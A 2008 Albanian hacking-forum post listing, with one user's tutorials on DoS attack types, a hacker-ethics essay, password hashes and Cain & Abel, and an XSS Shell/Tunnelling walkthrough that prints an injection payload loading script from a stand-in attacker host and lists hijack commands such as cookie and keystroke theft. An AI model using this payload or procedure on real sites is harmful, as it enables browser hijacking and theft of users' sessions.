 Show Posts
|
|
Pages: 1 [2] 3 4 ... 6
|
|
11
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 21, 2008, 10:13:31 AM
|
qe dikur mavon tkalon en monotoni
hahaha gabim je, monotoni ju kalon lamerave te cilet nuk punojne, pritojne te lexojin, presin vetem tools nga te tjeret jane parazit, nuk explorojne.. keshtu kalo mir |
|
|
|
|
13
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 20, 2008, 01:57:40 AM
|
man em ki shti me menu shum rreth qatyne fjelve shka d.m.th hacker edhe ma shum pun e fshtir po kur je i etur per dije duhesh me msu e me msu e me msu sa per hackim te webave menojsha se o seni ma i leti qe e bon veq me ni te klikune po jo nuk ish e vertet qky ke nashta shkrimi ma i miri qe e kum has en internet flm shum  njeri hacking nuk eshte vetem hackiratje e webave dhe addresave msn lol.. eshte nje menyre jetese, nje menyre mendimi.. |
|
|
|
|
16
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 19, 2008, 07:19:51 PM
|
Teardrop Attacks
Kur të dhënat janë të dërguar përmes TCP/IP networkut, janë të ndara në copëza të vogla. Ato copëza përmbajnë fusha të kompresuara në TCP headers që përshkruajnë kur të dhënat fillojnë dhe mbarojnë. Në një sulm Teardrop, sulmuesi dërgon copëza jo valide të fushave të bllokuara në fushën e kompresuar, e cila mund të dërgoj sistemin e caktuar në crash kur provon ti rigrumbullon copëzat e të dhënave.
Bonk Attacks
Bonk sulmet janë më të thjeshta se Teardrop sulmet. Duke dërguar IP fragmente (copeza) me shkelje të fushave të kompresuara në TCP header, fusha të kompresuara që janë shumë të mëdha. Kjo mund të shkaktoj që sistemi të shkoje në crash.
Land Attacks
Gjate sulmeve Land sulmuesi dërgon një TCP SYN paket të imituar më të njëjtën burim IP-je dhe destinacion adrese. Kjo e bën sistemin në siklet me versione të vjetruara të TCP/IP sepse pranon një TCP lidhje të kërkuar nga vet. Kjo mund të dërgoj sistemin në crash.
ICMP
ICMP është dizajnuar për të pasur kontroll dhe testuar mesazhet përmes "IP networks".
Ndryshe nga "Transport Layer" protokollet TCP (Transmission Control Protocol) dhe UDP (User Datagram Protocol) të cilat operojnë në baze të IP, ICMP ekziston anash IP.
Prapë se prapë, shumë vegla siguruese si firewalls bllokojnë ose ç’kyçin të gjitha pjesët e ICMP për arsye sigurimi.
ICMP Message Types
ICMP operon duke dërguar dhe pranuar numra të limituar të llojeve të mesazheve. ICMP mesazhet janë të definuara në LANA ICMP Type Numbers.
Llojet e mesazhet më të thjeshta ICMP janë: - Type Name
- 0 Echo Reply
- 3 Destination Unreachable
- 4 Source Quench
- 5 Redirect
- 6 Alternate Host Address
- 8 Echo
- 9 Router Advertisement
- 10 Router Solicitation
- 11 Time Exceeded
- 12 Parameter Problem
- 13 Timestamp
- 14 Timestamp Reply
- 15 Information Request
- 16 Information Reply
- 17 Address Mask Request
- 18 Address Mask Reply
- 30 Traceroute
UDP
User Datagram Protocol (UDP) është njëra ndër protokollet e Internet protocol suite. Duke përdor UDP, programet në rrjetat e kompjuterit mund të dërgojnë mesazhe të shkurta ndonjëherë të njohura si datagrams (duke përdor Datagram Sockets) të tjetri. UDP është e njohur nganjëherë edhe si Universal Datagram Protocol.
IDS
Intrusion detection system (IDS) zakonisht detekton manipulime të pa dëshiruara të sistemeve kompjuterike, kryesisht ndërmjet internetit. Manipulimet mund të marrin formën e sulmeve nga "crackers". Një IDS nuk mund të detektoj sulme të enkriptuara.
Intrusion detecion system është përdorur të detektoj pjesë të veçuara të dëmshme që mund të shkaktojnë dëm në sistemet kompjuterike. Kjo përfshin sulmet e rrjetit kundër vulnerable services, të dhëna të sulmuara në aplikacione, hosti i sulmuar si nga privilege escalation, qasje të paautorizuara që mendojnë të kenë qasje në fajllet e ndjeshëm, dhe malware (viruses, trojan horses dhe worms).
TTL Expiration
Sulmet TTL expiration shkojnë në drejtim të kontrollit të mesazheve ICMP për ta përmbyt (flood) viktimën. Ne ketë sulm, burimi i adresës është e imituar që të ketë përputhshmëri me adresën e viktimës. TTL për paketat është në një vlere të vogël që zhduket në trafik në një ruter me shpejtësi të madhe. Kur TTL e paketës arrin zeron, ruteri e gjuan paketën dhe dërgon një mesazh ICMP TTL expired te burimi i adresës, në ketë rast sajti i viktimës. Që nga TTL expiration është bëre shpesh në karta interneti në ASIC, kjo mund të ketë shpejtësi ekstreme reflektive mediale.
Mënyra më e mirë qe të mbrohesh nga kësi lloj sulmi është që të limitojmë ICMP të gjitha ruterët vulnerable në pronarin e servisit të networkut. Disa networka janë duke ofruar që ta bëjn "off", ta ndalin procesimin e TTL expiration.
Distributed Denial of Service (DDoS) Attacks
Kur një sulmues sulmon nga burime të shumëfishta të sistemeve, është i quajtur si "Destributed Denial of Service (DDoS) attack". Nëse sulmuesi është në gjendje të organizoj një sasi të madhe te klientëve të konektuar, do të pranoj të kaloj përtej tyre. Prandaj, një denial of service do të ndodh. Kjo është një metodë e thjesht e përdorur nga "Hacktivist"-tet.
Megjithatë, sulmuesi në mënyrë tipike nuk i ka në pronësi këta kompjuter. Pronaret aktual zakonisht nuk janë të informuar për sistemin e tyre që po përdoret për një sulm DDoS. Sulmuesi zakonisht shpërndan Trojan Horses që përmbajne kode me qellim të keq (mailicious code) që e lejon sulmuesin ta kontrolloje sistemin e tyre. Si "malicious code" është edhe i referuar si "Backdoor". Kur njëherë këta Trojan Horses ekzekutohen, ata mund ti dërgojnë një email qeë ta informojnë se sistemi i tyre mund të kontrollohet nga ata (remotely controlled). Sulmuesi pastaj do të instaloj vegla (tools) që i duhen ta kryej sulmin. Kur sulmuesi munda ta kontrolloje mjaft mirë sistemin, të cilët mund të quhen si "zombies" ose "slaves", ai ose ajo mund të nis sulmin. Diagrami i mëposhtëm na shpjegon planë veprimet:
Në të shumtën e rasteve, është vështir apo ndoshta e pamundshme ta pengosh një sulm DDoS plotësisht. Disa rutera, firewall, dhe IDS janë në gjendje të detektojnë sulme DoS dhe të bllokojnë lidhje të dyshimta që të pengojnë serverin të ketë mbingarkesë (overloaded). Kur të jesh një viktimë i një sulmi DDoS në veprim e sipër, duhesh të kontaktosh ISP tënd që ta bllokosh IP adresën që shihet që mund të jetë burimi i sulmit. Megjithatë, sulmuesi krijon burim adresa të imituara, duke e bere shumë të veshit që ti gjurmosh burimin aktual të sulmit pa hyrje shtesë te korporatës së ISP tuaj.
Distributed Reflective Denial of Service (DRDoS) Attacks
Një sulm distributed reflective denial of service përdore kontrolle të mbledhura "remote" të kompjuterëve që ti dërgoj paketat e rreme te një media refleksive, në mënyre tipike te serverët ose ruterat në një sulme refleksivë i shpjeguar më poshtë. Figura na tregon për një DRDoS UDP dhe TCP një sulm flood. Siç na tregon diagrami është shumë vështir që të gjurmohet ky sulm sepse kontrollimi i kompjuterëve është dy shtresore e fshehur nga paketat e dërguara në sajtin e viktimës.
Në sulm DRDOS mund të përdor variante të ndryshme të sulmeve refleksive nga kompjuterët skllav nëpërmes hosteve refleksive të viktima. Trafiku nga kompjuteri kryesore të kompjuterët zombie (skllav) mund të jetë shumë i ulët, madje i fshehur me një normal ICMP echo reply ping paketa të cilat janë gati gjitha gjithmonë brenda networkut duke lejuar te kontrollohen kompjuterët skllav prapa firewalleve.
Mbrojtja nga sulmet DoS
Si sulmuesit të cilët gjejnë dobësi që të përdorën (vulnerabilities to be exploited) që të shkaktojnë sulme DoS, programerët e programeve apo me e rëndësishmja e sistemeve operative bëjnë lëshimin e patcheve që ti mënjanojnë këto lloj sulme.. P.sh. Microsoft e ka rregulluar OS e vet që ti mënjanoj SYN Flooding duke i limituar numrin e kërkesave SYN që të ruhen në memorien e sistemit që ta pengoj të mos merr "overloaded" mbi ngarkese.. Mire kjo është vetëm një rast.. SYN Flooding mund të ekzekutohet në shumë mënyra dhe mund të shpjegohet në shumë mënyra në të ardhmën keto patche ndoshta s’do të mund të jene në gjendje ti pengojnë këto sulme.. Kështu unë mendoj se duke bere update programet dhe sistemet operative me patche nga krijuesit e tyre është e nevojshme të dijmë për sulmet të cilat janë bëre kundër nesh dhe dobësitë (vulnerabiliy) të cilat mund të përdoren (exploited) kundër nesh..
|
|
|
|
|
17
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 19, 2008, 07:19:31 PM
|
Autori: logic
Mesimi: DoS
DoS Attacks
Sulmet Denial of Servive (DoS) janë ndër më të thjeshtat dhe më vulgare sot. DoS sulmet nuk kanë objektiv vjedhjen, modifikimin apo shkatërrimin e informatave, por të pengoj adaptimin e një përdoruesi nga përdorimi i një pune. Një sulm DoS vjen në shumë mënyra, nga më te thjeshta ndarja e fuqisë së një sistemi, ose përmbytja e një sistemi derisa të adoptohet në trafikun e rrjetit. Natyra publike e internetit e bën veçanërisht me pika të dobëta (vulnerable) nga sulmet DoS. Sulmet DoS/DDoS të shpjeguara poshtë janë të gjitha të bazuara në rrjetet e sulmeve DoS. DoS/DDoS sulmet janë edhe sulme aktive, si sulmuesit në vazhdimësi përpiqen të ndërrojnë diçka, në ketë rast vlefshmërinë e një serveri.
TCP SYN Flood Attack
Një shembull i thjeshtë i sulmeve DoS është "TCP SYN flood attack". Një seancë TCP është e ngritur duke përdor mekanizma shtrëngim duarsh të trefishta, i cili i lejon klientit dhe "host"-tit që të sinkronizoj lidhjen dhe të pranoj sekuencat e numrave fillestar. Hosti i përgjigjet me një SYN / ACK, përsëri të sinkronizoj. Pastaj klienti pranon dërgesën e paketës SYN / ACK duke i dërguar ACK. Kur hosti pranon ACK lidhja bëhet e hapur, duke lejuar trafikun nga dy anët. Lidhja mbetet e hapur deri sa klienti apo hosti lëshon një FIN ose RST paket, ose lidhja ka rëne (time out). Procesi është i ilustruar poshtë:
Në sulmet TCP SYN flood, sulmuesi krijon një lidhje TCP gjysmë të hapur duke i dërguar paketën fillestare SYN me një IP adresë të imituar, dhe kurrë nuk pranon SYN / ACK nga hosti me një ACK. Kjo eventualisht do të udhëheq drejt arritjes së limitit dhe ndalimin e pranimit të lidhjes nga përdoruesit e arsyeshëm. Shumë rutera sot janë në gjendje të detektojnë SYN floods duke monitoruar shumën e sezoneve TCP të mbetura pa përgjigje dhe duke i zhduk ato para se seanca të përfundoj. Ata shpesh mund të jene të konfiguruar që të caktojnë maksimumin e numrave të lejuar të konektimeve gjysmë të hapura, dhe limitin e shumës së kohës që hosti të pret për pranimin përfundimtar. Pa këto masa mbrojtëse, serveri mund eventualisht të del jashtë memories, duke shkaktuar falimentime absolute.
UDP Flood Attacks
UDP është një lidhje protokolli që nuk përdore mekanzima lidhje duarsh që të stabilizoj konektimin. Kjo gjë në mënyre relative është e lehte që të shpërdorohet për sulmet flood. Një sulm i zakonshëm UDP flood shpesh referohet si Pepsi attack, është një sulm ku sulmuesi dërgon një numër të madhe të paketa të imituara UDP në porte të rastësishme në host. Koha CPU, memorja, dhe bandwidth kërkon që të procedoj këto paketa që mund të bëjnë objektivin të pamundshëm për përdoruesit. Që ta minimizojmë rrezikun e sulmeve UDP flood, duhet të bëjmë disable UDP serviset e pa përdorshme në server dhe ti bllokojmë UDP portet e papërdorura me një firewall që ta mbroni rrjetin tuaj.
Ping of Death Attacks
Një tjerë sulm DoS i njohur mirë është Ping of Death. Sulmuesi dërgon një ICMP Echo kërkesë paket me një numër më të madh se 65,535 bytes, duke shkaktuar te pranuesi buffer overflow (buffer overflow--kalim i cakut, kufirit) dhe objektivi apo viktima, sistemi i tij të shkoj në crash ose reboot. Posaçërisht sistemet operative Windows, por edhe sisteme te vjetra të MAC dhe Linux dhe pajisje rrjeti si router mund të jene vulnerable nga Ping of Death.
Sistemet operative moderne dhe pajisjet e rrjetit pa problem nuk i vejnë re këto paketa mbi masë. Kurse sistemet operative mund zakonisht te bëjnë update me ndonjë patch.
Smurf Attacks
Sulm i rrezikshëm i DoS është ai Smurf attack, e cila ka mundësi te shkaktohet për shkak të konfigurimit të pajisjeve të rrjetit që përgjigjen të pasqyrimet e ICMP të dërguara te adresa transmetuese. Sulmuesi dërgon një sasia të madhe të ICMP trafikut të adresa transmetuese, dhe përdor IP adresën e viktimës si burim IP-je ashtu që përgjigja nga të gjitha pajisjet që i përgjigjen adresës transmetuese do ta përmbysin viktimën. Pjesa e rrezikshme e këtij sulmi është që sulmuesi mund të përdor një lidhje të dobët (low-bandwidth connection) që të rrezoj një lidhje të fortë (high-bandwidth connection). Sasia e trafikut e dërguar nga sulmuesi është e shumëfishuar nga një faktor që është i barabartë me numrin e hosteve prapa roterëve që i përgjigjet ICMP echo paketave.
Diagrami i mësipërm përshkruan një Smurf attack në progres. Sulmuesi dërgon paketa ICMP echo te ruteri ne 128KBps.
Sulmuesi i modifikon paketat duke ndërruar burimin e IP-ës të IP adresa e kompjuterit të viktimës ashtu që paketat imituese i do të dërgohen në adresën e caktuar. Destinacioni i adresës së paketave është "broadcast address" në ketë rast e kemi 129.64.255.255. Nëse ruteri s’është i konfiguruar që ti dërgoj përpara këto transmetime te hosti në anën tjetër te ruterit të gjitha këto hosti do t’iu përgjigjet. Në shembullin e mësipërm na jep të kuptojmë 640 Kbps (5 x 128 Kbps) të përgjigjeve ICMP do të dërgohen në sistemin e viktimës, ku e cili në mënyre efikase do të bëj të pa aftë lidhjen 512 Kbps. Përveç objektiviteti të sistemit, edhe ruteri ndërmjetësuesi është gjithashtu viktimë, edhe gjithashtu ato hoste ne "Bounce Site". Një sulm i thjesht që përdor UDP transmetime të paketave në vend të ICMP transmetimeve te paktës është e quajtur si "Fraggle Attack".
Është e vështir ta pengosh një Smurf attack plotësisht sepse ato janë të krijuar vetëm për rrjetat e konfiguruar gabimisht. Për tu siguruar nga këto sulme të duhet të instalosh një firewall dhe ta konfigurosh mir ruterin.
|
|
|
|
|
18
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 19, 2008, 07:17:21 PM
|
|
Etika e një hackeri të vërtet!
Ky është artikulli i parë që po shkruaj, dhe arsyja që vendosa të shkruaj është për temen më të pelqyer timen, e cila është “computer hacking”. Tash nuk është që të jeni hutuar me “system cracking” e cila natyrisht është akti i të pamendëve të cilët thyejnë sisteme, shpërndajnë viruse, dhe bëjnë gjëra të cilat i lëndojnë njerëzit e pafajshëm të cilët nuk ia kane idenë për botën e sigurimit. Mirë tani më lejoni të shkruaj për pikën kryesore të këtij artikulli. Do t’iu sqarohet të gjithëve të cilët e thërrasin veten “hacker”.
Këtu është e paraqitur një “paper” e cila paraqet se çfarë një “hacker” në të vërtet është.
Të gjithë ju fillestarët të cilët po hyni në botën e mrekullueshme të hacking, vej bast që hytë në hacking sepse deshët që të bëheni një ndër elitat e hackerëve ashtu si në filma apo. Më lejo të them diçka tani, tani ju as që të ju shkoj në mend që do të bëheni si ekipa e James Bondit të cilët marrin të dhënat ushtarake në sekonda, thjesht nuk është e mundur. Është rast shumë i rralle që dikush në të vërtet mund të hyj në sisteme që ka informata shumë të rëndësishme e te mos kapet. Të kapesh gati që nuk mund ti shmangesh. Edhe ata të cilët kanë vite eksperiencë në sigurim dhe programim në një mision të tillë do të kenë shume punë të mundimshme.
Ata që quhen “cool techno wiz kids” lavdërohen për hakiratjen e akounteve të msn-ës a ku ta di unë në shkolla, apo jo? Hmmmm këtu është një fjale për ata persona, ndoshta nuk është e mire ashtu siç tingëllon. Edhe nëse ata i kanë kryer ato gjera unë të them se kanë përdor disa “lamers” programe të internetit që kanë shfrytëzuar paditurinë e njerëzve që fare s’marrin erë në kompjuter apo në internet. Nëse do të ishin të vërtet ata kurrë nuk do të tregonin se çfarë kanë bëre në tëre shkollën. Kështu që mesazhi im është nëse dëshiron të bëhesh një lloj “Super Hacker” duke qene parazit (pra duke u ushqyer në krah të të tjerëve) hapi sytë sepse je duke ëndërruar. Pra ti je një fillestar dhe ti duhesh te mësosh bazën para se të bësh ndonjë gjë që t’iu lesh përshtypje shokëve të tu. Nëse fillon të lexosh, të lexosh dhe vetëm të lexosh ti do të korrësh frytet e hacking dhe do shohësh sa i mirë që mund të jetë.
Në paragrafin e fundit unë vetëm i kalova lehte mbi programet. Tani arsyeja që unë i minimizova programet është fakt i thjesht, që nëse ti shkrove një program, nuk është hacking. Çdo idiot mund të nis një program (Shpresoj!). Nëse fillon të përdoresh programet të cilat bëjnë çdo gjë për ty atëherë çfarë je duke mësuar. Dikur lexova diku në një nga qindra “hacking sites” se: “Hacking është përdorimi i diturisë për të fituar më shume dituri”. Atëherë i kalova ore të tëra duke menduar për të dhe të tregoj tani menjëherë se është definicioni më i mirë që kam dëgjuar ndonjëherë.
Tani nëse jeni një hacker mesatar apo më i mirë ti mund të kalosh këtë paragraf. Lexo ketë nëse të pëlqen. Po zgjat në mënyre të vazhdueshme kërkimi i të rinjve nëpër “chat roms” dhe “newsgroups” për njerëz inteligjent duke iu marre çdo “bit” durimi nga ata. Unë as që mund të numëroj të rinjët duke pyetur kështu: “Ju lutem më mëso të bej hack?” ose “Si të bëj hack?”. Nëse ke sadopak mendje ose pak tru ti kurrë nuk do ti flasësh këto fjalë nepër forume, chat rooms, newsgroups, ose në ndonjë lloj tjetër si këto. Unë nuk mund të filloj të tregoj ty se si zemërohesh nëse pyetesh me kësi pyetje të mendjelehtëve për shumë here me radhë. Dite pas dite, muaj pas muaji. E di që të jesh i ri të çdo gjë është vështire, por nëse ti insiston në bërjen e gjerave, atëherë ti do të jesh i pashmangshëm të mësosh të vërtetën e një gjëje. Mirëpo po e di që ti je ka brengosesh se si do te mësoj të hackesh atëherë? Do te përdoresh një makine kërkuese! Kërko pak këto gjëra si “hacking” dhe “computer security”. Nëse dëshiron të bisedosh me hacker të tjerë pyet pyetje specifike si “Din ndokush ndonjë URL të mirë”. Të tregoj se unë për ketë kohë që kam në hacking kam gjetur webet më te mira nga njerëzit në forume. Mos e zë në goje se nëse gjen ndonjë ueb të mirë atëherë bëhu i sinqerte dhe ndaje më të tjerët. Jam i sigurt që do të mirëpritesh.
Por çfare është hack i vërtet pra?
Kështu unë ju tregova se çfarë hacking nuk është. Tani le flasim se çfarë është. Hacking, siç e thash edhe më pare, është përdorimi i diturisë që ti zgjerosh kufijtë e diturisë. Tani, kjo do të thotë se ti duhesh të bëhesh familjar me sistemet operative në internet të cilat janë Unix dhe Windows. Port surfing është edhe një metode e respektueshme e hacking. Ti s’do të më besosh se sa gjera mund të mësohen nga port surfing. Hakeret lundrojnë në porte për të mësuar sa më shumë, aq sa është e mundshme për një sistem. Kjo është për arsye të rregullave të arta të thyerjes së sistemeve. Ti nuk mund të thyesh një sistem të cilin nuk e kupton. Tani të supozojmë e kemi gjetur fjalëkalimin dhe u futem brenda në sistem. Por çfarë do të bësh nëse hyn brenda. Pasi ti mësosh sistemet operative të ndryshme hapi tjetër është programimi të cilën kohët e fundit ia kam filluar.
Hackerët e vërtet janë inteligjent, ata duhet të jene. Gjithashtu ata bëjnë më të vërtet një pune të mirë në shkollë, sepse ata janë uritur për dituri. Ose nuk janë aq të mirë në shkollë sepse është tmerrësisht e mërzitshme. Dhe ajo të cilët janë të mërzitur nuk është sepse nuk ju ndien për mesim, përkundrazi ata janë të etur të mësojnë, çfarëdo që ju del para. Një hacker i vërtet dëshiron të dijë çdo gjë. Ata janë të mërzitur në shkollë sepse shkollat mëson të njëjtat gjëra, përsëri përsëri dhe përsëri asgjë të re, asgjë sfiduese.
Hackeret e vërtet janë kurioz dhe këmbëngulës. Një hacker i vertet nuk hyn në sisteme për të shkatërruar çdo gjë që i del para. Hackerët e vërtet dëshirojnë të mëson, ose dëshiron ta kënaqin kuriozitetin e tyre, kjo është pse ata hyjnë në sisteme. Te eksplorojnë rreth e rrotull vendin ku ata nuk kanë qene më parë, të gjurmojnë të gjitha qoshet e vogla të botes.
Hackeret e vërtet i dallon mendimi, ata mendojnë ndryshe nga tjerët, pyesin ndryshe, janë të heshtur. Po mendoj ata i mbajnë zbulimet e tyre në brendësi.
Hmmm mendoj që mjafton. Gjithmonë kujtoje se çfarë është hackeri në të vërtet.
|
|
|
|
|
19
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 19, 2008, 07:16:25 PM
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author: Logic
Tutorial: XSS Tunnelling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XSS Tunnelling
Në gjendje për ta kuptuar çka është XSS Tunneling dhe si punon, në fillim të duhet të kuptosh çka është XSS Channel dhe si funksionon XSS Channel.
Ky mësim iu dedikohet atyre të cilët janë pak a shumë të njohur me sulmet XSS.
Çka është një XSS Channel?
Një XSS Channel është një komunikate interaktive në mes dy sistemeve i cili është i hapur me një sulm XSS. Në nivelin teknik, është një tip i AJAX aplikacioni i cili mund merr komanda, i kthen reagimet prapa dhe është në gjendje të flas cross-domain.
XSS Shell është një vegël e cila mund të përdoret të lidh një XSS Channel në mes të viktimës dhe një sulmuesi, ashtu që sulmuesi të kontrollon shfletuesin e viktimës duke i dërguar komanda. Kjo komunikate është dy-drejtimesh.
Për të marr një XSS Shell që të punoj, një sulmues duhet të injektoj Javascriptin e XSS Shellit në lidhje me rrugën e një XSS sulmuesi. Atëherë sulmuesi është në gjendje të kontrolloj viktimën. Pas këtij hapi, sulmuesi mund të shikoj kërkesat, reagimet dhe është në gjendje të udhëzoj viktimën të zbatoj kërkesat etj.
Një shembull i sulmit injektues është paraqitur poshtë:
*******************************************
* http://example.com/q="><script *
* src="http://xssshellserver/xssshell.asp"></script> *
*******************************************
Si punon një XSS Shell?
XSS Shell është një aplikacion i cili i ka tri pjesë.
E para, server-side e XSS Shell koordinon XSS Shell-in në mes sulmuesit dhe viktimës. Është një server-side aplikacioni dhe kërkon një ASP dhe ISS ueb server. Përdor MS Access databaza si depo.
Pjesa e dytë e veglës është një client-side dhe është i shkruar në JavaScript. Kjo ngarkohet në kërkuesin e viktimës dhe është përgjegjëse për dërgesën dhe procedimin e komandave së bashku me furnizimin e kanalit në mes viktimës dhe sulmuesit. Ky kodë është testuar në Firefox, IE6 dhe IE7.
Pjesa finale e XSS Shell-it është ndërhyrja administrive. Një sulmues mund të dërgoj komanda dhe të pranoj përgjigjet nga shfletuesi i viktimës. Në anën tjetër është ASP që kërkon IIS.
Të gjithë hapat e ndjekur, mos prit për secilin që vazhdimisht të kërkojnë për përgjigjet dhe kërkesat në kohe të caktuar.
1. Një sulmues infekton një uebsite me qëndrueshmëri (me vazhdimësi) me një sulm XSS i cili thërret Remote XSS Shell JavaScript.
2. Viktima ndjek një link ose viziton një faqe ku i ekzekutuhohet JavaScript-i brenda domainit.
3. Shfletuesi i viktimës fillon të kryej kërkesat e serverit të XSS Shell-it dhe kërkon për komanda të reja.
4. Kur shfletuesi i viktimës merr një komandë të re p.sh. si (Get Cookies, Execute custom JavaScript, Get Key logger Data etc.) është e mundshme dhe i kthen rezultatet të XSS Shell.
5. Sulmuesi mund të shtyp komanda të reja të shfletuesi i viktimës-ave dhe të shikon rezultatet nga ndërhyrja administrive e XSS Shell.
Pikat e interesimit
● XSS Shell komunikata bazohet në remote JavaScript ngarkesën në gjendje që të kalon sigurimin.
● Në ekzekutimin e parë, XSS Shell ri-gjeneron faqen. Kështu që viktima të ndjek linkun; XSS Shell do të mbetet në faqe dhe pastaj, do të lejon sulmuesin të kontrollon shfletuesin e viktimës. Deri sa viktima të pranon atë dritare (edhe nëse viktima ndjek ndonjë link në ndonjë website tjetër) seanca e viktimës do të hapet dhe shfletuesi do të ndjek komandat e sulmuesit.
● Disa XSS Shell komanda janë të paraqitura më poshtë:
-Get Cookie
-Get Current Page
-Execute custom Javascript
-Get Mouse Log
-Get Keylogger Data
-Get Clipboard
-Get Internal IP Address (Firefox – JVM)
-Check visited links (CSS histori hack)
-Crash Browser (nëse nuk të pëlqen viktima! )
● Është një burim i hapur dhe është lehte të fusim komanda të reja si skanimi i porteve.
● XSS Shell është shumë i rrezikshëm në qëndrueshmëri me XSS vulnerabilities. Pikërisht që fakti që një sulmues mund të infektoj qindra shfletues dhe ti menaxhon ato njëherësh.
Pse është më i mirë se sulëm klasik i XSS?
● Një sulmues do të ketë më shume se një viktimë. Pasi ta kontrollosh shfletuesit e viktimës(viktimave) sulmuesi do të jete në gjendje të vendos për hapin tjetër duke u bazuar ne përgjigjet dhe ambientin e ndodhur.
● Do të lejoj ty që të kalosh këta hapa:
IP Restrictions
Basic/NTLM Auth Based or smilar authentications.
● Ashtu që është e mundur të ju dërgosh alert(“owned!”) te mijëra viktima dhe të krijosh një temporary XSS powered botnet!
Çka është XSS Tunnelling?
Tunnelling është një mënyrë ku shkëmbehen të dhënat në mes dy networkave mirë.
XSS Tunnelling është lidhja e trafikut të HTTP ndërmjet XSS Channel për të përdor praktikisht cilindo aplikacion që mbështet HTTP proxies.
Çka është XSS Tunnel?
XSS Tunnel është standard HTTP proxy e cila është e ulur në një sistem të sulmuesit. Cilado vegël e cila është e konfiguruar të përdoret do të bën galerinë (skrofullën, tunelin) nëpërmes XSS Channel aktive në serverin e XSS Shell. XSS Tunnel konverton kërkesat dhe përgjigjet sinqertë që të vërtetoj HTTP përgjigjet dhe XSS Shell kërkesat.
XSS Tunnel është e shkruar në .NET dhe kërkon .NET Framework që të punoj. Është një GPL aplikacioni në burim të hapur i licencuar (Licensed open source application).
Dobia nga XSS Tunnelling
-Do të bëj të mundshme pothuaj çdo vegël që mbështet HTTP Proxies!
-Është e mundshme të përdoret ndonjë vegël automatike siç është Nikto, SQL Injectors, HTTP brute-forcer kundër ndonjë IP fushe të kufizuar te ndonjë uebsajt.
-Është shumë e mirë për demonstrimin e rezultateve të një sulëmi XSS.
Si punon XSS Tunnel?
1. XSS Tunnel lidhet te një XSS Shell i caktuar dhe përdor identitetin e viktimës së tanishme (viktima që të kontrollohet).
2. HTTP klienti lokal (browser, Nikto etj.) dërgon HTTP kërkesa te XSS Tunnel
-XSS Tunnel konverton kërkesat e HTTP në kërkesa të cilat XSS Shell mund ti kuptoj dhe të procedoj. Pastaj këto kërkesa i dërgon te XSS Shell Server.
-XSS Shell Server ruan këto kërkesa në databazën (Te gjitha këto kërkesa punojnë vetëm për viktima specifike përmes XSS Tunnel. Kjo ID mund të shihet në “dashboard” e XSS Tunnel.)
3. Klienti XSS Shell (i cili rrinë në JavaScript në shfletuesin e viktimës) përmban kërkesa periodike për XSS Shell Server dhe shikon për komanda të reja të procedon.
Procesi i sulmit
1. Fillo XSS Shell Server,
2. Konfiguro XSS Tunnel për të përdorur XSS Shell Server,
3. Përgatit sulmin XSS (paraqite të një vulnerable uebsajt ose dërgo ndonjë link etc.),
4. Starto XSS Tunnel dhe prit për viktimën,
5. Konfiguro veglën ose shfletuesin për të përdorur XSS Tunnel,
6. Kur të shikon ndonjë viktimë në XSS Tunnel, starto të përdoresh shfletuesin / veglën për domainin e planifikuar.
|
|
|
|
|
20
|
Zona jeshile / ZONË E LIRË / Re: Some papers from me!
|
on: July 19, 2008, 07:13:11 PM
|
LAN Man Hash (LM)
Lan Man Hash (LM) është një Microsoft algoritëm i enkriptuar që përdoret të enkriptoj fjalëkalimet për Windows NT, 95, 98, ME 2000, XP, dhe 2003 Server. Megjithëse në versionet e fundit të Windows (XP, 2003, Vista) Microsoft i ka ndërruar të NTLM për shumicën e enkriptimeve, por LM është ende shumë i përdorur. LM është krijuar që ti merr përdoruesit fjalëkalimet dhe ti konvertoj ato në të gjitha shkronja të mëdha dhe ato ti ndajë fjalëkalimet në dy gjysma nga shtate karaktere. Secila gjysmë me shtatë karaktere është i konvertuar në fjalëkalim “bit hash” dhe pastaj të dy gjysmat janë të kombinuara që krijojnë një 32 bit hash e cila është hashi i kompletuar LM.
ED39C160E34521DCBF02B3DFE2 30653A = CERT276ROSENVA
ED39C160E34521DC__________ BF02B3DFE230653A=_______ CERT276______ROSENVA
1st 7 upper Encrypted______2nd 7 Upper encrypted________pass^________pass^
Message Digest Five (MD5)
MD5 hashi është një 128-bit (16-byte) hash dhe janë përfaqësues tipik si numra hexadecimal 32-digit. MD5 (Message-Degest algoritëm 5) ishte dizajnuar nga Ronald Rivest në 1991 dhe ishte krijuar të zëvendësoj algoritmet e vjetra. Sot MD5 hashi është se tepërmi është i përdorur dhe pjesa më e madhe janë të siguruara. Gjeja më e mirë të kujtosh është se me çdo fjalëkalim të duhet të besh atë të komplikuar dhe të gjatë. Fjalëkalimet më të mira janë 15 karaktere ose me fjalëkalimet të gjatë që përmbajnë shkronja të mëdha, të vogla, numra dhe karaktere speciale gjithashtu.
MD5 Hash Example:
16d2c02aad8d116bc403f73454 a5eeb1 = emocan
32-Digit Hash______________________ __pass^Cain & Able
CCNA, CSE, CCAI, MCP, Network+
Në rregull po e filloje ketë artikull me vendin ku mund ta shkarkoni programin Cain & Able: www.oxid.it.
Çfarë është mund te pyesni? Pra është si një mbulesë për rrjetin tuaj. Cain & Abel është një vegël gjetje fjalëkalimesh për sistemet operative Microsoft. Të lejon lehte gjetjen e fjalëkalimeve të ndryshme me gjurmimin dhe skanimin e rrjetit, thyerjen e fjalëkalimeve të enkriptuara duke përdor “Dictionary, Brute-Force dhe Cryptanalysis attacks (Rainbow Tables)”, dekodimin e fjalëkalime të veshtira, zbulimin e fjalëkalimit dhe analizimin e protokolleve. Ky program ju lejon dhe mbulimin e IP dhe MAC që t’iu bëni jetën e mundimshme adminava duke provuar që t’u kapin në subnet. Gjera tjera që mund të ofrojë Cain është WiFi scanning, Cisco config downloading (via SNMP), propozohet për kompjuterët portativ, dhe shumë gjëra me NetBIOS skanimin e domeinava etj...
|
|
|
|
Komuniteti i Teknologjisë së Informacionit; diskutime, komuniteti, teknologjia, informatika, kompjutera, programim, albania albanian kosova kosovo technology, shkarkime, filma shqiptare, programe shqip, zone e lire.
